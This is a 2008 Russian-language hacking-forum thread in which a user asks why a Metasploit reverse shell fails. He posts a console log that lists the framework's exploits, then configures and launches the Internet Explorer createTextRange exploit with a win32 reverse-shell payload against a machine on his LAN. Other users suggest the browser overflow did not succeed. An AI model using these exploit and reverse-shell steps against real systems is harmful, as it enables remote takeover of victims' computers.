Metaexploit

Discussion in 'Безопасность и Анонимность' started by wofan, 15 Nov 2008.

  1. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    помогите у меня в метаексплоите нефуричит реверс шел потскажите как ето можно исправить? ***
     
    #1 wofan, 15 Nov 2008
  2. D1mka

    D1mka Elder - Старейшина

    Joined:
    2 Jan 2008
    Messages:
    123
    Likes Received:
    14
    Reputations:
    2
    сатьи лебедя читай внимательно http://forum.antichat.ru/thread21599.html
     
    #2 D1mka, 15 Nov 2008
  3. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    я ейо уже читал у меня неконектитса комп?
     
    #3 wofan, 15 Nov 2008
  4. 0verbreaK

    0verbreaK Elder - Старейшина

    Joined:
    30 Apr 2008
    Messages:
    318
    Likes Received:
    42
    Reputations:
    -3
    версия меты?
     
    #4 0verbreaK, 16 Nov 2008
  5. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    версия мети 2.7
     
    #5 wofan, 16 Nov 2008
  6. 0verbreaK

    0verbreaK Elder - Старейшина

    Joined:
    30 Apr 2008
    Messages:
    318
    Likes Received:
    42
    Reputations:
    -3
    Попробуй поновее или же предыдущую
     
    #6 0verbreaK, 16 Nov 2008
  7. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    а алтернативного ришения нет?
     
    #7 wofan, 16 Nov 2008
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Лог консоли скинул бы лучше (полный)
     
    #8 -=lebed=-, 16 Nov 2008
  9. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    вот лог
    _____________________________________
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================

    3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
    Credits Metasploit Framework Credits
    afp_loginext AppleFileServer LoginExt PathName Overflow
    aim_goaway AOL Instant Messenger goaway Overflow
    altn_webadmin Alt-N WebAdmin USER Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    arkeia_agent_access Arkeia Backup Client Remote Access
    arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
    arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
    awstats_configdir_exec AWStats configdir Remote Command Execution
    backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
    backupexec_dump Veritas Backup Exec Windows Remote File Access
    backupexec_ns Veritas Backup Exec Name Service Overflow
    backupexec_registry Veritas Backup Exec Server Registry Access
    badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
    bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
    barracuda_img_exec Barracuda IMG.PL Remote Command Execution
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow
    bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow
    cabrightstor_disco CA BrightStor Discovery Service Overflow
    cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
    cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
    cabrightstor_uniagent CA BrightStor Universal Agent Overflow
    cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
    cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
    calicclnt_getconfig CA License Client GETCONFIG Overflow
    calicserv_getconfig CA License Server GETCONFIG Overflow
    cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
    edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow
    eiq_license EIQ License Manager Overflow
    eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)
    firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)
    freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow
    freeftpd_user freeFTPd USER Overflow
    freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
    futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
    globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
    gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
    google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
    hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
    hpux_lpd_exec HP-UX LPD Command Execution
    ia_webmail IA WebMail 3.x Buffer Overflow
    icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
    ie_createobject Internet Explorer COM CreateObject Code Execution
    ie_createtextrange Internet Explorer createTextRange() Code Execution
    ie_iscomponentinstalled Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow
    ie_objecttype Internet Explorer Object Type Overflow
    ie_vml_rectfill Internet Explorer VML Fill Method Code Execution
    ie_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Code Execution
    ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Exec
    ution
    iis40_htr IIS 4.0 .HTR Buffer Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
    iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
    iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
    iis_source_dumper IIS Web Application Source Code Disclosure
    iis_w3who_overflow IIS w3who.dll ISAPI Overflow
    imail_imap_delete IMail IMAP4D Delete Overflow
    imail_ldap IMail LDAP Service Buffer Overflow
    irix_lpsched_exec IRIX lpsched Command Execution
    kerio_auth Kerio Personal Firewall 2 (2.1.4) Remote Auth Packet Overflow
    lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
    lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL)
    mailenable_auth_header MailEnable Authorization Header Buffer Overflow
    mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
    mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow
    maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
    mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtPilot Source Overflow
    mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
    mercantec_softcart Mercantec SoftCart CGI Overflow
    mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
    mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow
    minishare_get_overflow Minishare 1.4.1 Buffer Overflow
    mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Executi
    on
    ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow
    ms05_039_pnp Microsoft PnP MS05-039 Overflow
    msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
    msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
    msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
    mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
    mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
    netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow
    netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
    niprint_lpd NIPrint LPD Request Overflow
    novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
    openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
    openview_omniback HP OpenView Omniback II Command Execution
    oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
    oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
    oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
    pajax_remote_exec PAJAX Remote Command Execution
    payload_handler Metasploit Framework Payload Handler
    peercast_url_linux PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux)
    peercast_url_win32 PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)
    php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
    php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
    php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
    phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
    phpnuke_search_module PHPNuke Search Module SQL Injection Vulnerability
    poptop_negative_read Poptop Negative Read Overflow
    privatewire_gateway_win32 Private Wire Gateway Buffer Overflow (win32)
    putty_ssh PuTTy.exe <= v0.53 Buffer Overflow
    realserver_describe_linux RealServer Describe Buffer Overflow
    realvnc_41_bypass RealVNC 4.1 Authentication Bypass
    realvnc_client RealVNC 3.3.7 Client Buffer Overflow
    rras_ms06_025 Microsoft RRAS MSO6-025 Stack Overflow
    rras_ms06_025_rasman Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow
    rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow
    safari_safefiles_exec Safari Archive Metadata Command Execution
    samba_nttrans Samba Fragment Reassembly Overflow
    samba_trans2open Samba trans2open Overflow
    samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
    samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
    sambar6_search_results Sambar 6 Search Results Buffer Overflow
    seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
    securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
    sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
    servu_mdtm_overflow Serv-U FTPD MDTM Overflow
    shixxnote_font ShixxNOTE 6.net Font Buffer Overflow
    shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow

    slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
    smb_sniffer SMB Password Capture Service
    solaris_dtspcd_noir Solaris dtspcd Heap Overflow
    solaris_kcms_readfile Solaris KCMS Arbitary File Read
    solaris_lpd_exec Solaris LPD Command Execution
    solaris_lpd_unlink Solaris LPD Arbitrary File Delete
    solaris_sadmind_exec Solaris sadmind Command Execution
    solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
    solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
    sphpblog_file_upload Simple PHP Blog remote command execution
    squid_ntlm_authenticate Squid NTLM Authenticate Overflow
    svnserve_date Subversion Date Svnserve
    sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow
    sygate_policy_manager Sygate Management Server SQL Injection
    tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow
    trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
    ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow
    uow_imap4_copy University of Washington IMAP4 COPY Overflow
    uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
    ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
    ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
    warftpd_165_pass War-FTPD 1.65 PASS Overflow
    warftpd_165_user War-FTPD 1.65 USER Overflow
    webstar_ftp_user WebSTAR FTP Server USER Overflow
    winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow
    windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
    wins_ms04_045 Microsoft WINS MS04-045 Code Execution
    wmailserver_smtp SoftiaCom WMailserver 1.0 SMTP Buffer Overflow
    wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
    wzdftpd_site Wzdftpd SITE Command Arbitrary Command Execution
    ypops_smtp YahooPOPS! <= 0.6 SMTP Buffer Overflow
    zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow

    msf > use ie_createtextrange
    msf ie_createtextrange > show payloads

    Metasploit Framework Usable Payloads
    ====================================

    win32_downloadexec Windows Executable Download and Execute
    win32_exec Windows Execute Command
    win32_passivex Windows PassiveX ActiveX Injection Payload
    win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
    win32_passivex_stg Windows Staged PassiveX Shell
    win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server Inject

    msf ie_createtextrange > set PALOAD win32_reverse
    PALOAD -> win32_reverse
    msf ie_createtextrange > show options

    Exploit Options
    ===============

    Exploit: Name Default Description
    -------- -------- ------- ----------------------------
    optional HTTPHOST 0.0.0.0 The local HTTP listener host
    required HTTPPORT 8080 The local HTTP listener port

    Target: Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)

    msf ie_createtextrange > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_createtextrange(win32_reverse) > show options

    Exploit and Payload Options
    ===========================

    Exploit: Name Default Description
    -------- -------- ------- ----------------------------
    optional HTTPHOST 0.0.0.0 The local HTTP listener host
    required HTTPPORT 8080 The local HTTP listener port

    Payload: Name Default Description
    -------- -------- ------- ------------------------------------------
    required EXITFUNC seh Exit technique: "process", "thread", "seh"
    required LHOST Local address to receive connection
    required LPORT 4321 Local port to receive connection

    Target: Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)

    msf ie_createtextrange(win32_reverse) > set HTTPHOST 192.168.1.51
    HTTPHOST -> 192.168.1.51
    msf ie_createtextrange(win32_reverse) > set LHOST 192.168.1.51
    LHOST -> 192.168.1.51
    msf ie_createtextrange(win32_reverse) > sel LPORT 1031
    msfconsole: sel: command not found
    msf ie_createtextrange(win32_reverse) > set LPORT 1031
    LPORT -> 1031
    msf ie_createtextrange(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://192.168.1.51:8080/
    [*] Client connected from 192.168.1.52:1061 (Windows).
    [*] Got connection from 192.168.1.51:1031 <-> 192.168.1.52:1062

    [*] Exiting Reverse Handler.
     
    #9 wofan, 16 Nov 2008
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Сплоит на переполнение, срабатывает не всегда, походу не пробил браузер...
     
    #10 -=lebed=-, 17 Nov 2008
  11. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    что значит не пробил
     
    #11 wofan, 17 Nov 2008
  12. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    значит, что эксплоит не сработал.
    и вообще оно Metasploit называеться
     
    #12 Pernat1y, 17 Nov 2008
  13. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    а почему тогда все остальние начинки работают?
     
    #13 wofan, 17 Nov 2008
    Last edited: 17 Nov 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.